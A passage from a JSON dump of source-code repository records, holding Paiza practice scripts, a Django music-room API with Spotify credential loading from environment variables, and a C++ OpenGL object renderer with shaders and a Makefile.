"9ec8c0723b2fba91295ce24bcb5a3190bdad5c73", "content_id": "e2871afa45d5e8344a1dea462e088a4b8e0dbac2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "YAML", "length_bytes": 207, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Paiza/Go/docker-compose.yml", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "version: '3'\nservices:\n app:\n image: golang:latest\n container_name: go_container\n tty: true\n environment:\n - GO111MODULE=on\n volumes:\n - ./:/go/src/app\n working_dir: /go/src/app\n" }, { "alpha_fraction": 0.5347222089767456, "alphanum_fraction": 0.5486111044883728, "avg_line_length": 15.941176414489746, "blob_id": "e4f12392ae47c79e7c5b99ba6990c22f19219524", "content_id": "07441fbdfc8d6f1f9ba6bb74a408208f45984a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 316, "license_type": "no_license", "max_line_length": 32, "num_lines": 17, "path": "/Paiza/Python/B073/main.py", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "# import fileinput\n# nm = input().split(\" \")\n# n = int(nm[0])\n# m = int(nm[1])\n#\n# trees = input().split(\" \")\n#\n# for line in fileinput.input():\n# print(line)\n\n # 行数を取得\nnum_lines = int(input())\n\n# 1行ずつ取り出し\nfor i in range(num_lines):\n line = input()\n print(i+1, \"行目:\" + line)\n" }, { "alpha_fraction": 0.4968944191932678, "alphanum_fraction": 0.5124223828315735, "avg_line_length": 19.125, "blob_id": "54d95375eea56620e29ffcd584b94cda6eea264e", "content_id": "9e1b997c94a5794c2f590e829f6e088843d0af14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 34, "num_lines": 16, "path": "/Paiza/Python/C075/main.py", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "input_line = input()\ninput_list = input_line.split(\" \")\nn = int(input_list[0])\nm = int(input_list[1])\np = 0\n\nfor i in range(m):\n input_line = input()\n price = int(input_line)\n if p < price:\n n = n - price\n point = int(price*0.1)\n p = p + point\n else:\n p = p - price\n print(n, p)\n" } ]
5
opavelkachalo/music_controller
https://github.com/opavelkachalo/music_controller
b6b5590e87886609cb2410ffa5f01295f51bc20e
815ca0e923c4595d2c2bad010198b2d1d6e95bfa
c937a2f164888197a72ce5dd957b7ebf7189fb18
refs/heads/master
2023-03-09T14:07:27.549864
2021-02-23T13:44:34
2021-02-23T13:44:34
331,396,976
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6214796304702759, "alphanum_fraction": 0.6290675401687622, "avg_line_length": 43.5, "blob_id": "ddb430babfb8e7719cfa63c508b64b847fa75201", "content_id": "bd1de3309310454bf2c88e4728813fd26513f4d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6853, "license_type": "no_license", "max_line_length": 117, "num_lines": 154, "path": "/api/views.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from rest_framework import generics, status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.http import JsonResponse\nfrom .models import Room\nfrom .serializers import RoomSerializer, CreateRoomSerializer, UpdateRoomSerializer\n\n\nclass RoomView(generics.ListAPIView):\n queryset = Room.objects.all()\n serializer_class = RoomSerializer\n\n\nclass CreateRoomView(APIView):\n # creates new room\n # called from CreateRoomPage.js component\n serializer_class = CreateRoomSerializer\n\n def post(self, request):\n # if there wasn't any session on device, create new session with it's key\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n serializer = self.serializer_class(data=request.data)\n\n # if serializer's validation went successfully, get data from it\n if serializer.is_valid():\n guest_can_pause = serializer.data.get('guest_can_pause')\n votes_to_skip = serializer.data.get('votes_to_skip')\n\n # each host is identified by it's session key\n host = self.request.session.session_key\n queryset = Room.objects.filter(host=host)\n\n # existing of queryset means that user already has created a room once\n # and to create new room, we need to change 'guest_can_pause' and 'votes_to_skip' fields\n if queryset.exists():\n room = queryset[0]\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n self.request.session['room_code'] = room.code\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n\n # otherwise we need to create a room from zero, and put a session key as a host value\n else:\n room = Room(host=host, guest_can_pause=guest_can_pause, votes_to_skip=votes_to_skip)\n room.save()\n self.request.session['room_code'] = room.code\n return Response(RoomSerializer(room).data, status=status.HTTP_201_CREATED)\n\n return Response({'Bad Request': 'Invalid data...'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass GetRoom(APIView):\n # gets information about room by it's code\n # called from Room.js component\n lookup_url_kwarg = 'code'\n\n def get(self, request):\n # find if there is a code in request\n code = request.GET.get(self.lookup_url_kwarg)\n if code is not None:\n # select room with given code\n room = Room.objects.filter(code=code)\n if room.exists():\n # get data dictionary of room\n data = RoomSerializer(room[0]).data\n # add new boolean field \"is_host\"\n data['is_host'] = self.request.session.session_key == room[0].host\n return Response(data, status=status.HTTP_200_OK)\n return Response({'Room Not Found': 'Invalid Room Code'}, status=status.HTTP_404_NOT_FOUND)\n return Response({'Bad Request': 'Code parameter not found in request'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass JoinRoom(APIView):\n # joins the room by given code\n # called from JoinRoomPage.js component\n lookup_url_kwarg = \"code\"\n\n def post(self, request):\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # find if there is a code in request\n code = request.data.get(self.lookup_url_kwarg)\n if code is not None:\n # select rooms with given code\n room_result = Room.objects.filter(code=code)\n if room_result.exists() > 0:\n # add 'room_code' value to session data\n self.request.session['room_code'] = code\n return Response({'message': 'Room Joined!'}, status=status.HTTP_200_OK)\n return Response({'Bad request': 'Invalid Room Code'}, status=status.HTTP_404_NOT_FOUND)\n return Response({'Bad request': 'Invalid post data, code key not found'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserInRoom(APIView):\n # checks if user is in room\n # called from HomePage.js component\n def get(self, request):\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # if user is not in the room, 'code' will be equal to None\n data = {\n 'code': self.request.session.get('room_code'),\n }\n return JsonResponse(data, status=status.HTTP_200_OK)\n\n\nclass LeaveRoom(APIView):\n # leaves the room\n # called from Room.js component\n def post(self, request):\n if 'room_code' in self.request.session:\n # remove 'room_code' value from session data\n self.request.session.pop('room_code')\n # if host leaves the room, delete room from database\n host_id = self.request.session.session_key\n room_result = Room.objects.filter(host=host_id)\n if len(room_result) > 0:\n room = room_result[0]\n room.delete()\n return Response({'Message': 'Success'}, status=status.HTTP_200_OK)\n\n\nclass UpdateRoom(APIView):\n # updates room data\n # called from CreateRoomPage.js component\n serializer_class = UpdateRoomSerializer\n\n def patch(self, request):\n if not self.request.session.exists(self.request.session.session_key):\n self.request.session.create()\n # initialize serializer\n serializer = self.serializer_class(data=self.request.data)\n if serializer.is_valid():\n # getting data from serializer\n votes_to_skip = serializer.data.get('votes_to_skip')\n guest_can_pause = serializer.data.get('guest_can_pause')\n code = serializer.data.get('code')\n # checking if room exists\n queryset = Room.objects.filter(code=code)\n if not queryset.exists():\n return Response({'Message': 'Room not found'}, status=status.HTTP_404_NOT_FOUND)\n room = queryset[0]\n # only host can modify the room\n user_id = self.request.session.session_key\n if room.host != user_id:\n return Response({'Message': 'You are not a host'}, status=status.HTTP_403_FORBIDDEN)\n # changing and saving data\n room.guest_can_pause = guest_can_pause\n room.votes_to_skip = votes_to_skip\n room.save(update_fields=['guest_can_pause', 'votes_to_skip'])\n return Response(RoomSerializer(room).data, status=status.HTTP_200_OK)\n return Response({'Bad Request': 'Invalid data...'}, status=status.HTTP_400_BAD_REQUEST)\n" }, { "alpha_fraction": 0.6734693646430969, "alphanum_fraction": 0.7244898080825806, "avg_line_length": 23.5, "blob_id": "37e706097cb31f6dd2a67b423bfa4546aebbd7dd", "content_id": "d650cd265893ad6617f181c88d9f1a9dd247684b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 56, "num_lines": 8, "path": "/spotify/credentials.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from os import environ as env\nfrom varenv import load_vars\n\n\nload_vars()\nCLIENT_ID = env[\"CLIENT_ID\"]\nCLIENT_SECRET = env[\"CLIENT_SECRET\"]\nREDIRECT_URI = \"http://127.0.0.1:8000/spotify/redirect/\"\n" }, { "alpha_fraction": 0.6884779334068298, "alphanum_fraction": 0.6884779334068298, "avg_line_length": 27.1200008392334, "blob_id": "ecba6d7a8c95cf8fd7872ea6f9cd6cbecfb6308d", "content_id": "be4e97da15c9f0baf14a95ceb3f62351a08ab6e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 703, "license_type": "no_license", "max_line_length": 89, "num_lines": 25, "path": "/api/serializers.py", "repo_name": "opavelkachalo/music_controller", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Room\n\n\n# Serializer for Room model\nclass RoomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Room\n fields = ('id', 'code', 'host', 'guest_can_pause', 'votes_to_skip', 'created_at')\n\n\n# Serializer for creating Room model\nclass CreateRoomSerializer(serializers.ModelSerializer):\n class Meta:\n model = Room\n fields = ('guest_can_pause', 'votes_to_skip')\n\n\n# Serializer for updating Room model\nclass UpdateRoomSerializer(serializers.ModelSerializer):\n code = serializers.CharField(validators=[])\n\n class Meta:\n model = Room\n fields = ('guest_can_pause', 'votes_to_skip', 'code')\n" } ]
3
kristiHandayani/knuckleBall
https://github.com/kristiHandayani/knuckleBall
51deec313ac86a6736d9af99814267d89db94f7c
d1a75c23b99195a17e8074022b3628329406931e
8508e8f9369e0436b521f9d618d26f62f5391eef
refs/heads/master
2020-09-02T08:21:33.700186
2019-11-02T16:12:41
2019-11-02T16:12:41
219,178,259
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5854383111000061, "alphanum_fraction": 0.6121842265129089, "avg_line_length": 16.243244171142578, "blob_id": "640eaa1890fa6cc18f83252b7d1d97e1d60377a3", "content_id": "4eb9aae08e16defe130d47859defed4d82665771", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 673, "license_type": "no_license", "max_line_length": 42, "num_lines": 37, "path": "/knuckleBall.py", "repo_name": "kristiHandayani/knuckleBall", "src_encoding": "UTF-8", "text": "import turtle\r\n\r\n# define ball atribute\r\nwn = turtle.Screen()\r\nwn.bgcolor(\"black\")\r\nwn.title(\"Knuckle Ball Simulator\")\r\n\r\nball = turtle.Turtle()\r\nball.shape(\"circle\")\r\nball.color(\"green\")\r\nball.penup()\r\nball.speed(0)\r\n\r\n# define ball position before the kick\r\nball.goto(-200, -200)\r\n\r\n# define ball movement \r\nball.dy = 6\r\nball.dx = 4\r\n\r\n# slow down the ball\r\ngravity = 0.1\r\n\r\nwhile True:\r\n # change ball position\r\n ball.dy -= gravity\r\n ball.sety(ball.ycor() + ball.dy)\r\n ball.setx(ball.xcor() + ball.dx)\r\n\r\n if ball.ycor() < -200:\r\n ball.dy *= -1\r\n\r\n # assume the ball already in goal post\r\n if ball.xcor() >300:\r\n break\r\n\r\nwn.mainloop()" }, { "alpha_fraction": 0.7816901206970215, "alphanum_fraction": 0.7816901206970215, "avg_line_length": 22.66666603088379, "blob_id": "3792ce4106e2fb7ddb7924b41999ea357cd51d26", "content_id": "b52e1ee3fd749f4c40ddaa278f4baea404f32c4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 142, "license_type": "no_license", "max_line_length": 51, "num_lines": 6, "path": "/README.md", "repo_name": "kristiHandayani/knuckleBall", "src_encoding": "UTF-8", "text": "# knuckleBall\nSimulate how knuckle ball with Turtle\n\nto run this code, you need to install turtle first.\n\nrun this code : pip install turtles\n" } ]
2
ThanosPapas/diakrita
https://github.com/ThanosPapas/diakrita
a8ac3b4e12cc554e2210fcd5b976f900f9c4b1e1
5a3a47d0a75bc7b7738b01606879eec268928599
1a6e3fff5a1ba440d59d8c277292be79c4070323
refs/heads/main
2023-05-01T06:52:39.311903
2023-04-16T10:36:19
2023-04-16T10:36:19
344,625,588
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48953139781951904, "alphanum_fraction": 0.49651047587394714, "avg_line_length": 28.89230728149414, "blob_id": "2fc912d23c2c7baa58fe095cb1b6a5936a7c6bd0", "content_id": "4265711622cc5bd0b38ba0d896d33a35770a412f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2327, "license_type": "no_license", "max_line_length": 115, "num_lines": 65, "path": "/HavelHakimi.py", "repo_name": "ThanosPapas/diakrita", "src_encoding": "UTF-8", "text": "import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom random import choice\r\n\r\ndef test(lst, vathmos):\r\n G = nx.Graph()\r\n for i in range(len(lst)):\r\n x = choice(lst)\r\n while vathmos[x] == 0:\r\n x = choice(lst)\r\n tmp = vathmos[:]\r\n tmp[x] = 0 #για να μην συνδεθεί ο κόμβος με τον εαυτό του\r\n for j in range(vathmos[x]):\r\n ind = tmp.index(max(tmp))\r\n G.add_edge(x, ind)\r\n tmp[ind] -=1\r\n vathmos[ind] = tmp[ind] #αντιγράφω την αλλαγή στο original array\r\n tmp[ind] = 0 #για να μην συνδεθεί ο κόμβος με έναν άλλο πάνω από μία φορά (με παίδεψε πολύ αυτό!)\r\n vathmos[x] = 0\r\n if all(v==0 for v in vathmos):\r\n nx.draw_networkx(G)\r\n break\r\n\r\ndef check(lst):\r\n while True:\r\n lst.sort(reverse=True)\r\n x = lst[0]\r\n lst.pop(0)\r\n for i in range(x):\r\n try:\r\n lst[i] -= 1\r\n except IndexError:\r\n return False\r\n if any(v<0 for v in lst):\r\n return False\r\n if all(v==0 for v in lst):\r\n return True\r\n\r\ndef insert(n):\r\n lst = [i for i in range(n)]\r\n vathmos =[]\r\n for i in range(n):\r\n x = int(input(f\"Εισάγετε αριθμό δεσμών για τον {i + 1}ο κόμβο: \"))\r\n vathmos.append(x)\r\n if check(vathmos[:]): #ελέγχω αν η ακολουθία είναι γραφική, περνάω ένα αντίγραφο της λίστας με call by value\r\n test(lst, vathmos)\r\n else:\r\n print(\"Αυτή η ακολουθία δεν είναι γραφική.\")\r\n\r\ndef main():\r\n while True:\r\n x = input(\"Εισάγετε αριθμό κόμβων: \")\r\n try:\r\n n = int(x)\r\n if n <=1:\r\n print(\"Ο αριθμός πρέπει να είναι μεγαλύτερος του 1. \", end='')\r\n continue\r\n insert(n)\r\n plt.show()\r\n break\r\n except ValueError:\r\n print(\"Απαιτείται ακέραιος αριθμός. \", end='')\r\n\r\nif __name__ == '__main__':\r\n main()" } ]
1
MahanFathi/OBJET
https://github.com/MahanFathi/OBJET
d62d0d613a0d0f826138c5f96de4a8093640503d
c6e2366327852c18b30dbf2f439931860dc26bf9
f53cfe7a05361580069a1255ede7424f52352af4
refs/heads/master
2021-02-07T14:58:13.206492
2020-04-27T10:07:00
2020-04-27T10:07:00
244,041,203
16
0
null
2020-02-29T21:03:33
2020-03-17T21:37:16
2020-03-17T22:16:42
C++
[ { "alpha_fraction": 0.6197793483734131, "alphanum_fraction": 0.6237194538116455, "avg_line_length": 28.172412872314453, "blob_id": "e69931404ce5874d72d2cd75653c72de68d9de10", "content_id": "49694de014dc869f233d1540a202c981271a1446", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2538, "license_type": "permissive", "max_line_length": 138, "num_lines": 87, "path": "/src/object.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include \"object.h\"\n\n\nObject::Object(const char* pathToObjectJSON, const std::string &name):\n name(name)\n{\n objectData = new data::ObjectData(pathToObjectJSON);\n // read file via ASSIMP\n Assimp::Importer importer;\n const aiScene* scene = importer.ReadFile(objectData->objPath, aiProcess_Triangulate | aiProcess_FlipUVs | aiProcess_CalcTangentSpace);\n\n // check for errors\n if(!scene || scene->mFlags & AI_SCENE_FLAGS_INCOMPLETE || !scene->mRootNode)\n {\n std::cout << \"ERROR::ASSIMP:: \" << importer.GetErrorString() << std::endl;\n return;\n }\n\n processNode(scene->mRootNode, scene);\n}\n\n\nvoid Object::draw(Shader* shader) const\n{\n // set material attributes\n shader->setUniform(\"material.color\", objectData->color);\n shader->setUniform(\"material.ambientStrength\", objectData->ambientStrength);\n shader->setUniform(\"material.diffuseStrength\", objectData->diffuseStrength);\n shader->setUniform(\"material.specularStrength\", objectData->specularStrength);\n shader->setUniform(\"material.shininess\", 16.0f);\n\n // draw all mesh\n for(unsigned int i = 0; i < meshes.size(); i++) {\n meshes[i].draw(shader);\n }\n}\n\n\nvoid Object::processNode(aiNode *node, const aiScene *scene)\n{\n for(unsigned int i = 0; i < node->mNumMeshes; i++)\n {\n aiMesh* mesh = scene->mMeshes[node->mMeshes[i]];\n meshes.push_back(processMesh(mesh, scene));\n }\n \n for(unsigned int i = 0; i < node->mNumChildren; i++)\n {\n processNode(node->mChildren[i], scene);\n }\n}\n\n\nMesh Object::processMesh(aiMesh *mesh, const aiScene *scene)\n{\n // data to fill\n std::vector<Vertex> vertices;\n std::vector<unsigned int> indices;\n\n for(unsigned int i = 0; i < mesh->mNumVertices; i++)\n {\n Vertex vertex;\n glm::vec3 vector;\n // positions\n vector.x = mesh->mVertices[i].x;\n vector.y = mesh->mVertices[i].y;\n vector.z = mesh->mVertices[i].z;\n vertex.Position = vector;\n // normals\n vector.x = mesh->mNormals[i].x;\n vector.y = mesh->mNormals[i].y;\n vector.z = mesh->mNormals[i].z;\n vertex.Normal = vector;\n\n vertices.push_back(vertex);\n }\n\n for(unsigned int i = 0; i < mesh->mNumFaces; i++)\n {\n aiFace face = mesh->mFaces[i];\n // retrieve all indices of the face and store them in the indices vector\n for(unsigned int j = 0; j < face.mNumIndices; j++)\n indices.push_back(face.mIndices[j]);\n }\n\n return Mesh(vertices, indices);\n}\n" }, { "alpha_fraction": 0.7019089460372925, "alphanum_fraction": 0.7048457860946655, "avg_line_length": 24.22222137451172, "blob_id": "b46fe417e450285575ad0c74c99ba93325b81495", "content_id": "e7504b8fa92d07c8764e27a693e57c320b038f74", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 681, "license_type": "permissive", "max_line_length": 91, "num_lines": 27, "path": "/inc/shader.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <iostream>\n#include <math.h>\n\n#include <GL/glew.h>\n#include <glm/glm.hpp>\n\n#include <string>\n#include <fstream>\n#include <streambuf>\n\nclass Shader {\n\npublic:\n GLuint ID;\n\n Shader(const std::string &vertexShaderScript, const std::string &fragmentShaderScript);\n void use() const;\n\n void setUniform(const std::string &name, const float &value) const;\n void setUniform(const std::string &name, const int &value) const;\n void setUniform(const std::string &name, const bool &value) const;\n void setUniform(const std::string &name, const glm::mat4 &value) const;\n void setUniform(const std::string &name, const glm::vec3 &value) const;\n\n};\n" }, { "alpha_fraction": 0.8201754093170166, "alphanum_fraction": 0.8201754093170166, "avg_line_length": 31.571428298950195, "blob_id": "8842630356ef54570b476b56ec01383460e7434d", "content_id": "cb5ecfd9469abaa2e9282edd60d1f9cce9f449b3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 228, "license_type": "permissive", "max_line_length": 48, "num_lines": 7, "path": "/inc/glsls.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "// create a shader self-contained shared object\n#include <string>\n\nextern std::string objectVertexShader;\nextern std::string objectFragmentShader;\nextern std::string shadowVertexShader;\nextern std::string shadowFragmentShader;\n" }, { "alpha_fraction": 0.6245014071464539, "alphanum_fraction": 0.6393162608146667, "avg_line_length": 30.909090042114258, "blob_id": "5a48e1591222dcdaacc1f6fe19f6e354ebbda336", "content_id": "7a3a54aa26bd139fb865bb1cfde5b4adfbf48580", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1755, "license_type": "permissive", "max_line_length": 85, "num_lines": 55, "path": "/src/util.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <GLFW/glfw3.h>\n#include \"common.h\"\n\n\nvoid framebuffer_size_callback(GLFWwindow* window, int width, int height)\n{\n glViewport(0, 0, width, height);\n} \n\nvoid processInput(GLFWwindow *window)\n{\n if(glfwGetKey(window, GLFW_KEY_ESCAPE) == GLFW_PRESS)\n glfwSetWindowShouldClose(window, true);\n\n // cam adjustment\n const float cameraSpeed = 2.5f * deltaTime; // adjust accordingly\n if (glfwGetKey(window, GLFW_KEY_W) == GLFW_PRESS)\n cameraPos += cameraSpeed * cameraFront;\n if (glfwGetKey(window, GLFW_KEY_S) == GLFW_PRESS)\n cameraPos -= cameraSpeed * cameraFront;\n if (glfwGetKey(window, GLFW_KEY_A) == GLFW_PRESS)\n cameraPos -= glm::normalize(glm::cross(cameraFront, cameraUp)) * cameraSpeed;\n if (glfwGetKey(window, GLFW_KEY_D) == GLFW_PRESS)\n cameraPos += glm::normalize(glm::cross(cameraFront, cameraUp)) * cameraSpeed;\n}\n\nvoid mouse_callback(GLFWwindow* window, double xpos, double ypos) {\n static bool first = true;\n static float lastX;\n static float lastY;\n if (first) {\n lastX = xpos;\n lastY = ypos;\n first = false;\n }\n static float yaw{-90.0f};\n static float pitch{0.0f};\n float sensitivity = 0.05f;\n float offsetX = xpos - lastX;\n float offsetY = lastY - ypos;\n lastX = xpos;\n lastY = ypos;\n yaw += offsetX * sensitivity;\n pitch += offsetY * sensitivity;\n if(pitch > 89.0f)\n pitch = 89.0f;\n if(pitch < -89.0f)\n pitch = -89.0f;\n glm::vec3 direction;\n direction.x = cos(glm::radians(yaw)) * cos(glm::radians(pitch));\n direction.y = sin(glm::radians(pitch));\n direction.z = sin(glm::radians(yaw)) * cos(glm::radians(pitch));\n cameraFront = glm::normalize(direction);\n}\n" }, { "alpha_fraction": 0.7239958643913269, "alphanum_fraction": 0.729660153388977, "avg_line_length": 30.8360652923584, "blob_id": "feefeebc07a107522e1b1e4a98b9cb1f50ec0d3a", "content_id": "10294c4597ef7efb1bb3cbeffa9028f3ea3c801c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1942, "license_type": "permissive", "max_line_length": 99, "num_lines": 61, "path": "/src/shader.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <string>\n\n#include <glm/glm.hpp>\n#include <glm/gtc/type_ptr.hpp>\n\n#include \"shader.h\"\n\nShader::Shader(const std::string &vertexShaderScript, const std::string &fragmentShaderScript) {\n\n // vertex shader\n const char * vertexShaderSource = vertexShaderScript.c_str();\n GLuint vertexShader;\n vertexShader = glCreateShader(GL_VERTEX_SHADER);\n glShaderSource(vertexShader, 1, &vertexShaderSource, NULL);\n glCompileShader(vertexShader);\n\n // fragment shader\n const char * fragmentShaderSource = fragmentShaderScript.c_str();\n GLuint fragmentShader;\n fragmentShader = glCreateShader(GL_FRAGMENT_SHADER);\n glShaderSource(fragmentShader, 1, &fragmentShaderSource, NULL);\n glCompileShader(fragmentShader);\n\n // link shaders\n GLuint shaderProgram;\n shaderProgram = glCreateProgram();\n glAttachShader(shaderProgram, vertexShader);\n glAttachShader(shaderProgram, fragmentShader);\n glLinkProgram(shaderProgram);\n glUseProgram(shaderProgram);\n glDeleteShader(vertexShader);\n glDeleteShader(fragmentShader);\n\n ID = shaderProgram;\n}\n\nvoid Shader::use() const {\n glUseProgram(ID);\n}\n\n// util fuctions\nvoid Shader::setUniform(const std::string &name, const bool &value) const\n{\n glUniform1i(glGetUniformLocation(ID, name.c_str()), (int)value);\n}\nvoid Shader::setUniform(const std::string &name, const int &value) const\n{\n glUniform1i(glGetUniformLocation(ID, name.c_str()), value);\n}\nvoid Shader::setUniform(const std::string &name, const float &value) const\n{\n glUniform1f(glGetUniformLocation(ID, name.c_str()), value);\n}\nvoid Shader::setUniform(const std::string &name, const glm::mat4 &value) const\n{\n glUniformMatrix4fv(glGetUniformLocation(ID, name.c_str()), 1, GL_FALSE, glm::value_ptr(value));\n}\nvoid Shader::setUniform(const std::string &name, const glm::vec3 &value) const\n{\n glUniform3fv(glGetUniformLocation(ID, name.c_str()), 1, glm::value_ptr(value));\n}\n" }, { "alpha_fraction": 0.740963876247406, "alphanum_fraction": 0.759036123752594, "avg_line_length": 17.33333396911621, "blob_id": "08f6e66adc092c4fcfdd44798803800024566bb9", "content_id": "116e6f6f2d3f51442f980616c1c44ab669be535f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 166, "license_type": "permissive", "max_line_length": 29, "num_lines": 9, "path": "/inc/common.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#pragma once\n\n#include <string>\n#include <glm/glm.hpp>\n\nextern float deltaTime;\nextern glm::vec3 cameraPos;\nextern glm::vec3 cameraFront;\nextern glm::vec3 cameraUp;\n\n" }, { "alpha_fraction": 0.6021164059638977, "alphanum_fraction": 0.6074073910713196, "avg_line_length": 25.25, "blob_id": "ca60148641f83fc20fad0fc55bf2fdc6f4736b03", "content_id": "639f30b4a79bfb4b52aa384ab0e5527e23118bbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 945, "license_type": "permissive", "max_line_length": 117, "num_lines": 36, "path": "/Makefile", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "BIN=main\n\nSRC_DIR=src\nINC_DIR=inc\nOBJ_DIR=obj\n\nPY_OUT_DIR=pyobjet\n\nOUT_DIR=$(OBJ_DIR)/$(SRC_DIR)\n\nCC=clang++\nCFLAGS=-std=c++11 -O3 -fPIC -Wall -I$(INC_DIR)/ -I.\n\nLIBS=-lGLEW -lGLU -lGL -lglfw -lassimp -lfreeimage -lpthread\n\nSRCS=OBJET.cpp $(wildcard $(SRC_DIR)/*.c*)\nOBJS=$(addprefix $(OBJ_DIR)/, $(patsubst %.cpp, %.o, $(SRCS)))\n\n\ndefault:\n\t$(CC) $(CFLAGS) $(LIBS) -o $(BIN) $(SRCS) $(BIN).cpp\n\npython: $(OUT_DIR) $(OBJS)\n\tswig -python -c++ -outdir $(PY_OUT_DIR) OBJET.i\n\t$(CC) -c -g $(CFLAGS) `pkg-config --cflags --libs python3` $(LIBS) OBJET.cpp OBJET_wrap.cxx\n\t$(CC) -shared $(CFLAGS) `pkg-config --cflags --libs python3` $(OBJS) $(LIBS) OBJET_wrap.o -o $(PY_OUT_DIR)/_OBJET.so\n\n$(OBJ_DIR)/%.o: %.cpp\n\t$(CC) -c -g $(CFLAGS) -o $@ $<\n\n$(OUT_DIR):\n\tmkdir -p $(OUT_DIR)\n\nclean:\n\trm -rf $(BIN) $(OBJ_DIR) OBJET_wrap.cxx OBJET_wrap.o _OBJET.so OBJET.o __pycache__\n\trm -rf $(PY_OUT_DIR)/__pycache__ $(PY_OUT_DIR)/OBJET.py $(PY_OUT_DIR)/_OBJET.so\n" }, { "alpha_fraction": 0.6782522201538086, "alphanum_fraction": 0.6792452931404114, "avg_line_length": 21.886363983154297, "blob_id": "34f231c3fa4b6da097f8f667825e59147d5c4977", "content_id": "d9bd13ec9d908d9057bce2b4bb712052b411219f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1007, "license_type": "permissive", "max_line_length": 80, "num_lines": 44, "path": "/OBJET.h", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "#include <string>\n#include <vector>\n\n#include <GL/glew.h>\n#include <GLFW/glfw3.h>\n\n#include \"shader.h\"\n#include \"model.h\"\n\nclass OBJET\n{\npublic:\n /* Data */\n\n\n /* Function */\n OBJET(std::string pathToMetaJSON, int width, int heigth);\n void Draw();\n void ToImage(std::string pathToImage);\n std::vector<float> GetDepthMap();\n std::vector<int> GetImage();\n void SetCamera(std::vector<float> position, std::vector<float> target);\n void SetObjectPosition(std::string objectName, std::vector<float> position);\n void SetObjectYRotation(std::string objectName, float yRotation);\n void SetObjectScale(std::string objectName, float scale);\n\nprotected:\n /* Data */\n GLuint renderFramebuffer;\n GLuint depthMapFramebuffer;\n GLuint depthMap;\n\n unsigned width, height;\n unsigned shadowWidth, shadowHeight;\n GLFWwindow* window;\n Shader* objectShader;\n Shader* shadowShader;\n Model* model;\n\n /* Function */\n void InitOpenGL();\n void InitShaders();\n\n};\n" }, { "alpha_fraction": 0.7456359267234802, "alphanum_fraction": 0.7456359267234802, "avg_line_length": 21.27777862548828, "blob_id": "f95d1a5b28bc3a02c1fb26cac162c999494a6e1f", "content_id": "acbd46978b51c5a94e4af7514f2a968782f27daa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 401, "license_type": "permissive", "max_line_length": 48, "num_lines": 18, "path": "/src/glsls.cpp", "repo_name": "MahanFathi/OBJET", "src_encoding": "UTF-8", "text": "// create a shader self-contained shared object\n#include <string>\n\nstd::string objectVertexShader =\n#include \"shaders/vertex_shader.glsl\"\n ;\n\nstd::string objectFragmentShader =\n#include \"shaders/fragment_shader.glsl\"\n ;\n\nstd::string shadowVertexShader =\n#include \"shaders/shadow_vertex_shader.glsl\"\n ;\n\nstd::string shadowFragmentShader =\n#include \"shaders/shadow_fragment_shader.glsl\"\n ;\n" }, { "alpha_fraction": 0.6804261207580566, 